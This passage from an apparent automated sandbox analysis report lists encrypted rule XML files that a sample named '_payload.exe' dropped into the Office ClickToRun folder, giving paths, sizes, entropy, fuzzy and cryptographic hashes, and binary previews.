                                                                                                                                                                      SHA-512:0D9BE700AD28B43F847AC9040D890C22EA1CA6D35D475D29C63442A694DEC00A3BD3FDA28F6092D8ABE2C2FE6E80C2A7F3059EA20370ABC096A8620B8C405A45
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.`.n`.d.v.....w;.Z....,...".7...H....{S.d.....P...Qly.........aFn..E.^....p...,.c.)1o_.E.Hu..w..0...X.(.!. O.8.....A.sf...x......WW.p"8)YQ8...6..x...8...o."I.c|..5..[...(.."y.r...F.c.{..|..o.....ky..L..$.p......p..6.xqtkj..%\.z..l.......q..si.-..j7......<....Ti...b....Z..V....C.P..W.u.kK.H.....}<.....|................y..lt..>.,U#..1QzC....+#Y...9t..4!e,.9....F..znm...#~Lm,.6jt."...8.0.....j....}..5R.....:V...+'W._..6w.T.?.`..Tl..[*....pL...Qg.|<^..d<..-.4..V[a..Y6.|.....6.G!<EK.t....5.U..~J.Em.`X..y.,.!W./..T.<a.hT..=...s...:.~.,......Z...s.y..+^..\.]....&u.A.T..H....9s....w....X..?3).O.X...MsV9...........f.aw7..........x]P.....w.K...X.d.0~....h.....A.....1.36.......\..K.q<......5)..[..C...,:...3$r...$..c.. 48.\.:....S.3q.-`.B..4.m..#.sV.-s>.g.......m.2z+..M.....r.P..S...!z.v.d2ky.'?'bQw.0..7K.~.n..g.F....s`......<.......?M....../5..][H.=T...,z...L..|rC..#..5."..%..T...x.i...S....K_|..x.....(./r.x....a+5..I2.W..u.0./...c../.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703401v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1759
                                                                                                                                                                      Entropy (8bit):7.9106538014644
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Lgprq2RNFZ6mzK3z4/HxjzhA/QR3EqSCjK9gZTD:Lgp3waVF1SxM
                                                                                                                                                                      MD5:1A8824C63F4804211BE6CC6E323BBF0F
                                                                                                                                                                      SHA1:B03F52CED08EA5007898290A8FD0DE8889D202A5
                                                                                                                                                                      SHA-256:472AD2C50C9747AA490C2A3C3817C16FAD1DC100068198BE6DF5283A9142EBB0
                                                                                                                                                                      SHA-512:71724C132AE20DA0CA023E48C2E2BF1E141A0F1B17D89BEEB7065595605470ACB43115F9CBAF2C068F8977537F92BAE8F06ADEE3AE549C18B08AA658CB400C39
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?/.G..._.6J+.zd...-.T.t....7.9.?.........E82.5>.........M8....c).`q!w...N..z&.H..9.h...&;gc....s.F...m....eG..iz.=...-ZT..s.....%N..jm....h.L~.v.%...n.~e.......1.........p.X.:.!..8.\Bb.i...5.-.Oo~....L..M4'....6..6....s.t...vQ/..: .......n"...T.<8(.MYF.>.....d2.3.x.cp..Q......[.7B...g'x'.^...\...0f......y...I@9_n..M....jV...[3...S.E.N..!`....8......xW..IVp~.........U..m.....fS...{...RXyO..)L.?....o.L\.2.e...6...dI.. ..0.ZH..{.bDO..P.e/?...>w.|<..[hz.x..#e.a.E..1....cm...d....k.......%.O,e...c..UX5..M..Wl..D,...g.Q.2......Q.....k.....eD.\..........2....1}N.."......@..g.m....u..5......@.L.C.bCa...e.....a.w.5'.n&.n..we.A....8S..B.....f)2......]@....'Z...{M.*B.@zfT.=_...ux...+qj...~,....|..p.m....?..!|.qp.._...AH...(L6&A..W..'..8)........Q......U.r.O..,..h....Jr....qrN...zG>m...X........O...|......q.Z..."ri....]..`..7._..quY.%R9#m7f...!.~?7ac.>.f....Y.g....lU...B.J..}*a`../.]..>..).....v3.....m.U.{.F....:......En.....0.......uO..Q=......dh..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703450v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1706
                                                                                                                                                                      Entropy (8bit):7.887032437385476
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:wUO9c5LhTQejFtBnfz2uyL/ZVVMts8ES1Z+TxEHPRdDXrG2VxsSywxRD8NesO2bD:wle1W4vhf6j/CsiAxkPRpysPGeSD
                                                                                                                                                                      MD5:6944E791697EA9C22520195499FF9FA3
                                                                                                                                                                      SHA1:C99E3717B06DD9B607C0C3906E2E5A1A2599628D
                                                                                                                                                                      SHA-256:6C4E421BC75C88FC80634AC2863F1CD8D41039E98CD44E51776322CE360BFD81
                                                                                                                                                                      SHA-512:6653599BE213419B18DDA58B9B6F05CCEC60CBD832A04B2E172D4DAA1FB6D2F2F8B0C8A2C9833B5B6445890C1AECDB828E95259E21C79B4DE30EB6C7050B3C8C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?-.9RpF..t..a..>~]...%......H7.{I.@..u..?...F^..Q....j...C.[...d......7....:.....5.9. ...3...E.2..H~...Y.?...nBqH... .<E...M..a.T.g.W.Uc.!n....._.&j......D....Cvl.| .=1Y.....<...D..0...qxg.....QZ...JC.I..NU....W.U.1.zR..b..o...|^.yRh...f..n@..c.qJ..ul..a....d5.2*....{82|.}..[..J..5..gxt%."Wc6.....8sD+e>$...+..]`.&.v|..[...!*...x..21..'L...ttp.&...O...9.W.N.".....*.^+.0.r>..\...}. Y..*.%.%........1...H.4.+.,.:...F...=....2(1.._....*y....i2..'.I.n.%..0.S.y.u....|.m=.}.d.=.....U.cx...RKb...D....X.1G.+.zh..LBl.XR.j......`.5...;Q.d....qp.F.&.(k.-.-...J...j....\....$./.j../..._.c..g...$5.G?.Qj.O.."...oU....o..<I.f......<...uk.q.....b........+.L.U.z...U...*.[@.-..~.f]...Q....7r.@...a..`.....\....\4.z.p\.$S9.....`..^.....{...._-...Fr._7>O=q.Y.c..u......1K...>.9,.l..5.RU..9X.c...Q.wimoe.....X..a....k..v...4..D{.L....5,.b..o.......lH.0.*-M..a..b...........OG_ N!..!k.....I.e.....M)I._....~8.p...V..U..:&..!pD{a.<.|..v&..B._..B..R..+|_.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703451v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1743
                                                                                                                                                                      Entropy (8bit):7.884377099733632
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SZxio+Y8EHluAmtTfoi+Qsb0mfaT5hYBELXoAuiidK9M6OsqrWaBR216T6HQl311:ciol1AT5+Bb0uaIoucpOsohBozYHD
                                                                                                                                                                      MD5:E4A316FB2011A5217B4A9AE574858E89
                                                                                                                                                                      SHA1:0B73196693A139A2636F32023440B10D6B344561
                                                                                                                                                                      SHA-256:31B78AD72303ECDF67F50660DE37B3F3301F3E17E6F42FA5BD1C7079345BF493
                                                                                                                                                                      SHA-512:4ACD6783173618B4DCFC1C08EC8C14456155A7A45306DABB287FDEC95EA4ADFC9784A440A332489C62CE7B4CEE7F844F0957B14AA6EDAECE6754238DA5B1716C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..>vu..%;..?.7.O.v.`....*.f...[...r.#...r..D.F.4..hD..G....9..5.f..(0.%..v1..=..... ..m...@.Fk<.c...I.-...YRcyw~..@.U.B4.....8$L..Q.,.......=...&..P.....N.g....1.1o_...y._.7..Q.Tl.....]..6....$..@..-.G.R.|.ht..U.....;...s..j.:W...KY!..wY-....V...A...']dX...'...o..g..N.<...!.{........x)5......6.P._..P.~.4..v<..c4...7|.9...&..I^X...+Dm..r...1+'........V..../|... .2I.M4..Cs..o....1..>..|.}.E..v...(..2d..4EkM...!./...s..H..D.T....F.........!........S...(..S.. p..Z..9Z0.p.n.J..+m...Q./E.E........sU...`...O..fj.."x,...uL......k.*d6..;.8....1...m...p.TL.CJv1j.0.1..)......+]....V.}^@]bw...O..v~U...N)....#.St.&..o...d.)#..d.../..l....[y.<4.;...5.<.[...z.wI[.t.-.,.,.....Q......3..B.cf.].S..4x...HU...0JN .<...1.On.1......s."...`8......P[....-F.*j#.A..N Q..A..n1.s{...b.Y...v0n.4.X&."..E=...v.Gq....,L;.._'.Q/P...T.[;S*K.a...v<..i7.xx.......h..&.Q.{.L>..7....1iURt6.....r(z`..3w&b...kpGL...L}....f.9._.../.^..%.....g......4.iR..@...2os.M?H.&.qO.7uX.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703500v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.886312988215865
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Bt6XMXeRkX+TEXw7rzlV1OB/+GM1LGynoJ492Gx+D:BtEsuTv7rPMBotoT
                                                                                                                                                                      MD5:5EE638F3220FB366A48BA8B3BB746ECF
                                                                                                                                                                      SHA1:44276F08E3C3A001A296F17E12D674BEA1012C21
                                                                                                                                                                      SHA-256:B993FF86487D06E361BE94517E340F27F6BA39AA66461A9F3CCAA4374F796051
                                                                                                                                                                      SHA-512:FC19D71F57A4AB2E9CF10574488430B338FE9AA6CD80D6A4EA3962B3416D8A89252B6884828D385E551A3540F752A5864CA51BC91DA33032F353A81662CC2D65
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..3.3......&5..J....n..P.j7BWP.m}W.R|,Tb...,.3.4..U..q...-...;r.D..+)R.nt.....4M........J.<.....f.Wa..[..1...Xi..j.s..gb.G.0....h.k.eXJ...6.QQP.....C.D....2.&GM$bd..J...Ps.......Z"..m...*..F{.Q.rQ.L.*.A..^.O.E..w..v....x...MBfUS..N..eo...[...K..':....[....1.V't.:J....K.8c:.....S..V.W...3..#....FN..!wQ.3:..`....(..uF.j.F .,.P'+..C....9....*`...Q.$.c/...8>q_..`)...{..H.]5..g.-..*_.^...y...0...@....y.o....@.-.<'U.!.=.x.Zi.F."..+.q.wP.J.I^P?V..".f.q......-..Z.F..AZ<...$..*.D./..Xtd.9*h.......w8.w..s.'..;_~.%.ze.iG..#X.....P.c.....7..d.1\:.....9<.V.!/....V........?9.....1.{7.....=f...s.........M...PR.K..H}Rz..`. .sy..Y....Ho..B.<..v...fgK|.`H.0....@.s....{...........;....z..`f...V...T..?.......ma.a9X|};...D...,2.v.Sl).lt..cD.Z..N...(.83."..FH.O..b....Q...........Yl.......JVV.._S.mK$(.zZ.u.C''f..v.D.f.?....J5..$\x..ga..0..b$...J..?.e.8.A....a..w.O....C.....q.]....N.LX6a.......Pn8..~......:|i...."...dIC.CwC~.r|...I.Y.Y...>7.o.*.+gh-`@wb`*.Z

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703501v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.861129942729491
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:MG6+45o8i2hFBgo9OlE/OgEyFpTGVL2OYQPoGsD:f6K8i21gmCCwL24PoGI
                                                                                                                                                                      MD5:F181F8259AABD8D8FBCE84729815F1C7
                                                                                                                                                                      SHA1:2895517F2D94782E0636551D48CE5F4749B356A6
                                                                                                                                                                      SHA-256:0D6381337EA5E5DDE04790DDB9E4470E6637B87C5C68AA2655366880CEFBD720
                                                                                                                                                                      SHA-512:D36277A2E221572DEC5506AAE30881B6189E7662C7F2B4AA1329D6D64853A2A18BD292B48611CED4B25D797B9888BD3C5A5296F55FD5AA87AF90EA4FC594119D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.....i..mO.O..t...Mu.hg..S.O.Y.....N.F....B.'....l..8.....r.c...5y.>Ge..S...h....T..B......7..G._l.....7.4..7...z.(p&%,.......8qe........Q.A....O.......c.y...5..)..........)..].8......(.......Xd.V52.L.+..H..{`.7$..L.@j...t3..|..]?_..U..@iNW.....K...v.O.....q.......8...|.;d:...x.|..x.sX.)..F.....3...y.....I..4.w...*..9]..#..=Ht...d././rV7.H%.=..x*.B..?.G.y.....7a.r.Y.&...4.Y...v>.D..|..a.b.a.o.V......eb.b..;.;..P{(........U]E6.xH........dnK^<.b.v..........G.._53j..G.\.+.7<.a.a..........,"8.0.V....p~U..UnED.O.._.. .]..( 4....d..4.Y...'T...35J..l0.H....p..e...-r......KW.@.cf..^.t..8..b.;x<..@..#..E..v.t.)_<.b1...Z(|V.d.1...rB>.{..,...o.7.O..P6...T".....?hP...E....*..(8..ttT&.z..=.<WA...........P.A4U/ ...........q....k.xV.4.t....<..[.z.N.t....T..:..9...KZ......).D>.9...;.....M.K!&UnG...W).[L...Wbt...|.Y...pHRd......pe.BV..T.s..X."&.?.+..E...B...Te.>!.......J.Pz)t...v....@..w..2|`Dt..O...Eg..o~6J.M..)..-....l./..../.@..O...a..+.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703550v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1706
                                                                                                                                                                      Entropy (8bit):7.890030839779996
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:mCRaLqZXaX9rV49KuTBeQ6dkqQoo0oFTEGMrw8lD:zpKJV4UEL6dkqQoo0AvMZd
                                                                                                                                                                      MD5:5E016691532E4736B2135B50401C3DC7
                                                                                                                                                                      SHA1:05DA444A1006B3A67471B5000F35A4B12CE06D47
                                                                                                                                                                      SHA-256:CF1C46CF6746A4DD6664AA6B69752618C97E81F905AA818F1E4AE2965089FAFD
                                                                                                                                                                      SHA-512:60E0B2D24E0088A6669364838C19B56F815C510C3CE62AD45EA4012F3EC36BBB1140F82597643ED7746E7AAFEEB62D27D9348FA9A604CE962B8C701F0EE0631D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..+....X+b.VsIk@n...I....3.R^..s.7.....B#/..9d..=.$:..............<..5.Ot0..z...>......a. .I.. S.4.U9.6.....qj...].....U6y..].......F.`?.L7.........) a..h..XZ|.R..-u..+......+.E.c(l.:.'...CT.....F..3...$...3x...8.3...2....)W.T.|.@Ei.E.WY.O.T#!.s.L.....h..s.K...W..m6&..3...B$.M..:.G.#_.&.:J.....yJ....Cd...5..|V?.@.:..A}b....99.:%.M..y....#.R.........9.2V63...-N@%y|..9..g..Y.85..@0.>..\.}4....>.s0o.1.qw..%q/..J.5....u.w5.8....5..!.W.m....z*...'[....................6.M.K..B.....;..%....u.DTy.T.....#....F...W{.:.q..u........n....H.r....X.N.3*d..~.e`..,.] 6e.2..I.K.MFx.....07M...y&.l*.>..N........xR..$.J.2L.~..l{G/f..*s.O..S.S.*o.K..*;.-...-..._[Q......G.^...4...a^.....:.KP.h...l7.s.{.;.. "..U..'b.b...."u...6.E...|..&.3+...W.h+O.....%...../#w.dV0...Zx.z4..D..?.P..oA..n...Q..!..y.u........:do...V.........4...g..V.y:..}...Ss3...G7..t1~a`..w.:....:.a.....8...../.4....._........eir.l...}w....U...fRD.=...g.Y.A.Wk4~h..o...M.G.Q......O-...g#~H...5..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703551v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1743
                                                                                                                                                                      Entropy (8bit):7.891972267320112
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:7RMe8jCuH2T3Hn8fqadGh3VbRXx0WBT+D:VMe8j9H2TRa0TR6p
                                                                                                                                                                      MD5:C7B6FE7A4FFAA600717F0EC905A7484D
                                                                                                                                                                      SHA1:916FFFC27EEE32E26E48DAB613564DA208437A59
                                                                                                                                                                      SHA-256:2572DE71C888773AEC840C6CEAA8963266CCE2460FC2F98FEC8580619A8113D0
                                                                                                                                                                      SHA-512:3BE915B87C36BD21CD09A3C7D284A119E2F4087E07C79062742DE5E78BB5EDBDB5DDA060E49D10A2FBABD10FEA9F9768D93B1A635C852F7AEF8B91774D06A1AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?........=.-....g<..24..;...$0. #/..).%...<..'<6CBj.>!G/QY...n"H...-......n.D....X.....Zo.A.<^.*.:..9..p.q.e..aV...?.e.s.)...T\T."....D....x.rf.:~.4...tw...w&..h2....w....`9.).z.Z.43..j.u....<V..>.9..K...ru..,v]..y..s<j\."m.r....{..K.. ...95...J..m%.\..)...!$...UW%qR...Z..()...7.L.E...QR.E...0z(W?>.%..Nn.c@.q.N.....,.....].3K../...b_L........|f.....k.l .U..r...]h.P.*...&3.=.D.....M..#.`-.C.D...q.gnE.q......=..@^=..].F<.>......6....B?.....6`....I....J.hA...;4]..8w.\...r........5l}.S8c....*~gm_..U..V.6....Y......L...*U.)...z..7P.......v.A. .#V.J..r[......v.^...0U.N.O.S....ad..n,.....u.5....q.Wqw--:....n.wX.....bO9.8Y..9&O...:A/./@w(...i.s....q...r....X..B9..u..G..K....E.U@...D.M.+Y......f/...T......Z..z.......g..Y.)6......w.S.V.0^..W....9m9Z.-...z_.K.wU....U...3..; bz.4.Hdq...O...Y6;{.|..sl.V..........:.y....t<......(...]..+.-.....n.Z.....k.{..n..}...B..>...Cf9;.+.a..i....X..B@-..%...a..A..Q...wB.......g.k..7.......1XfZ..&.D.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703600v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1692
                                                                                                                                                                      Entropy (8bit):7.874360198814976
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9YQXulEOhvXgHbjlXwcIkUkINL8lkiUND:6kuEOVQlXwcIzkIR8u
                                                                                                                                                                      MD5:E482BD1C26357572482FC44516B038C9
                                                                                                                                                                      SHA1:0006A4C616EC95F90B13607D1A51E32659DF6B2B
                                                                                                                                                                      SHA-256:AA5A65E81DB11B38A5FA75678EC1058C45B1D301D37B74CA1483D872DF397395
                                                                                                                                                                      SHA-512:39F127C738CEA98724164532F0A6472A52978CA18976DFF081B9BFC97EF7AAEB8A3562FD66C923F7207AC032C4113BFE89BC02BD43188909EF92E0790D977A83
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.8.?b.V.]..*..8.........b....x*..%..........l~d..6..t1.....>..P.G..Au.>1.....M.iCM...$J...Tj3 ..h)`/.dA..3......w..i.....GW...(7..rX.L.Ip/..{..8BUl.......%KRG..X.....'.}..".....\KOc....Pd..Rx_+..-...E.x.....7[.%.0........K...b......u0^y....g!e........8.]...s.&.*1.....]...h..-..F....U.:..z..<".i.>...J......oaY..;..i.e.....%..@..H.P.g......l...#..........o.Q..#.....@..k.z...d.b....he.fR.....'.?...D..4`S..m.bE...<I.%....v...2h.4.\F*....E.?.!..j/..(..7.nw.&cJ.%...$zau.@E...>,..g.=..g....c.b.#...c..S/p.JD..#)....b....._...B*2..D..r..h.....-.....F....:....Z.).\.5..=.....Nx.i..v.(.NK[..../.$!.....B..x..S.....B.u..!Z'.....B.!..I...q.Y.2...".v.I...;GU$.......d..B..G.l.a;.T.f...Q*]....cJ.HV.-^......l6w.r.X...9.Q....L....+...........)..}H..BO..nE...k..9.x.8G6%r..O..W..c....3.:...*..-...... .) U.3.B.A.jI..s.e..w..Qf.:.QyP...\..a.v.6...v7...^...ReGU...R.-.2y.......BQT'3P..3E.41..........."U...20...6."..p=.$o.....&l.....p;.B.L.F.......;6.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703601v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1729
                                                                                                                                                                      Entropy (8bit):7.88701857728451
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:NGijA5cnGeupho8eWSFB2BM28O9NBopQD:NG+Aouwyt8O1o+
                                                                                                                                                                      MD5:88FDCCF0FB0E051E9FA905C505DFEC9B
                                                                                                                                                                      SHA1:1477029B177F1D3FD32EFDDBFAAECAF61314FD06
                                                                                                                                                                      SHA-256:B0DECFCFA1EEEA1DE7BBADB7F5D433C727F57FF4E9C2742F4F8626DDCA96C29C
                                                                                                                                                                      SHA-512:1F8450AC17A84BED650E9181E516E4EEBED1C626E8D31A07CEFC745A59602C8FD43174C6C677F9FA919B51DF031DE90C68650FCDF6F5D11C934A82B920C2AFE4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?i....=pE.lI...........|?....#..V.....rAC...#i..E.)..3.O..f.....~9.].<.Wg.......B.Jo.+....@.....-..b..m}3...d. ....#..C.......[D...i.|&.!.....%......z?..m).N.)h..-\9.m........{.......*......+o..#ywKY.K..$Rr6.?...Uc$..jT=.M..u.....'.C-H.TG..'...I._B, ODK....N:z.F..B.....u..._P.%:.@U...L...V.*...T.?..E..U./.X}.....\tOHz..u.[.r..ah.:.t.Y..`E.&.W...!.K......S.Y.|.'.1.$tQ.c.#...:zf.F.H.??.....VA......'..>..9V..PE.@.......d..k...e..0..a..G..h6.0....AU$6v..fD.g.^...... ..x..p....-YAQ......C.qdM.t..Zg.G.)...y..b....i.U..`.H..dnRY..(.Q.*m.^.D3..d......M.9.g..Z5-*.X...i.`Y...s(........&.^.v.bALgi...W....>`.H4^c..E.i.6..]...f.C...;..[j...-U....Ds...F..d.c.C.#.1..n..pQ>[..Jr................am_n..;o!....z.d...?..h.Tc...N...;..c....M`q...%.C.ne.l..q...-..Z.j..[........LaJ..G8..U....L\.U..c.1.3j.;c...+|...^+....8...;U..rU..z....T.....p....qHq.......RC=..[S>.....9......Hubd~I.....................)T....$..~..a8.J~{.Jm.Yk..uq.."............

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703650v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1694
                                                                                                                                                                      Entropy (8bit):7.893880111195852
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:RpZUn6/d3AvoAEe3btj9W6VYYtNFiWWnD:Rp+6Fwt3xbYYjFiW8
                                                                                                                                                                      MD5:123447C59329F94627D456609741CEBB
                                                                                                                                                                      SHA1:F3356DDCEFB7D56582B806A6410D833414BD5A05
                                                                                                                                                                      SHA-256:000367B8E5901339DFEACFB20274F7922EA5F7BE2A73D1711213D6772C788F50
                                                                                                                                                                      SHA-512:256925901F9357A9B9EEE78FE6D5605E30C41E293C8A78E59179D2A7AB69C05F566E5D267757281F093AE1E6B9A489B0FFCDF811E3E1077E7795A2CA7A66AD02
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?,f.T/. ..f.@,....j.*...D[0rZ*...pu..."g.... ...J7....d;...7s.,BG.....Q.@I.a.E4.@.vx.}..L.|...m.Cda6.....^.7 .4..?F.5V.B.x.......J:E...d.uJZb...s.....k....<..X*....,.}c.".a.'. ..)=EC{b.5.../...R...^Q...i.....@.D.M.z..Aq..~"sC=....'.\G...lS..0.:.vM.0x.FWJ`...).i.Z.\...I.w/(.a......t....+[...d..{.....m."H.a..G2.....zj........N$.z..;\v.......^...a...>^p..1.&...2.H.7qX.M...Z..|.....^...;.i.*.....y.Q....J....^..Y..8.8...@..^..O...h.b(A@.CLP_!.}.4.n...l..-S9G........J..P..H.Q.C .....B....^...CK.&...h....k.....%"..K......6J..v..].@.Q3w..$..G{..U...<...4.T>#J.H..."..IN..Y.Z....B........e..m.P3..%{*......,..o*U$.6n|~..oJ.M..i...f...j....L....c.}.bY.......d.f.....A...=.5..G.".kI......m..).6.G.D.Y......^..r#i.-9;.G.R=.H..L..[.'...i.5jkG..qA.j0..]$...*]...."...............5q.S...Nd.3...q..#p3...Z.dr..a-V.8.+..Xg.x[0....G7*.[..1%]p..o.)Z....[.....YK.........~\.F.K.d.X...{(h..N...,N..)*.&eazN...QC:......9.1.#.@.r...b....%.....jA.'lk.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703651v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                      Entropy (8bit):7.882563143256407
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PmcUCoArp3SsHMN4Vj2lRyn7/Zk1Btz4UOaD:ukHxBk4V2/xBmUh
                                                                                                                                                                      MD5:AB542DC412973C3745E5888754E0560C
                                                                                                                                                                      SHA1:0D4768B346773FCF39F5BBB10F629ADCE63399EC
                                                                                                                                                                      SHA-256:0A2255160B1B795C4D0381F58B1FE27E150A34AB689FC54317124F4E6A6BC042
                                                                                                                                                                      SHA-512:F1ECFC5FA597EB0668B0206738A25A22C6C0F7DDB07E3FB321C64D77241F5ED3A2B34E2C4E9DFB5CC55F4D3EE535036A885BE74C13AF9BDCBE188B1F52F3646E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.j.-.p_.[..:..t^......m..d.u.mB-..l]...._..V.+C.I>.-.....~#..].......`+.*.u..7H..S..P..k.-.F-..6..(....o...Vym#.....O....&Y6!.O.P..#..wm3.&I\..N..W.Z....P"].p..8...%.q...........!..4..E....heJ..@#..g....<._.,[.fZ.p.Uw.i.n...S.oz0J.9V^3....ox7g.(..8...c....A..W.lj.UKU..4..M...4.f.I..&.A5.IF.../.?...o...T.j..... .I ...2+Q~8.K..Ij....F...O......s..S.&...hI(..^#!...2...t...`....n........gUb...\.0...y.+|.lS..Y..q...>..B.e;......-g)6.}0.r6%.qP.f..l..v.1V...O.....=..(K.b.'%.!.....<V..W..Vg......5F.Y.(."h...E..==.=&<......._.^<.,""Z]e....R2...gH..|..s....N.%z.t4....Xv...Seg.Q.Tp.'.......(q*.....8.I..>:6.-.o.=..g.3.y.|9 ........u..)H.......b..*..h<&d.q,0r.[X..o......K.[.K&l.....e.!v..g..'.....>.,......M...>/"Lc.......H...P..m..&......k.7..>!..5.Q=..rkC<..2.......m.>x6E.....I.Mzl/+..UYc...!X7..M...v?..'A......s....e.Q..e..1.l.,m.:.%.......WS11B..).....)...o.......5.%.".;...2Y...MHp(.........i.D.6..[R.Y/j~_).....'.<.-...Y...;.0.y.vy..Uq.D..t..h+N.x.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703700v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1712
                                                                                                                                                                      Entropy (8bit):7.8856794711914855
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:yFWtM/x68S0clj8gdagpPz/romci65EGi/mvy6HHIpZtD:yv/Y86dag9Domh6PsdV
                                                                                                                                                                      MD5:709526985EDB9797CFDDD9559E1AF7A8
                                                                                                                                                                      SHA1:C07AC8B07325EACB7E1078CCF3BA4568BE47A0A2
                                                                                                                                                                      SHA-256:AB8B9D1AE1BF8D23106E6DC0117A4ED74DAABD05E424349CDFA3979A6899C5FA
